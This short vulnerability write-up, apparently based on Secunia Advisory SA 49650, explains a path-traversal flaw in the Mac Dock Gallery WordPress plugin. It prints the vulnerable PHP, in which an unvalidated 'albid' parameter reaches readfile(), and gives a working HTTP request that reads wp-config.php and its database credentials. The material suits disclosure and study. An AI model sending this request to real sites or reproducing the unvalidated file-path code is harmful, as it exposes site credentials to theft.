Advisory
Secunia Advisory SA 49650
Analysis
This vulnerability relies on a lack of validation of the “albid” in macdownload.php, which is passed straight into the path that is read at line 37 into the response. This cases an arbitrary file disclosure vulnerability.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
require_once( dirname(__FILE__) . '/macDirectory.php'); $folder = dirname(plugin_basename(__FILE__)); $file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); ?> |
If we make a request like this, it will cause the code to read out the wp-config.php file, which will contain database credentials in.
|
1 2 |
GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1 Host: 192.168.80.130 |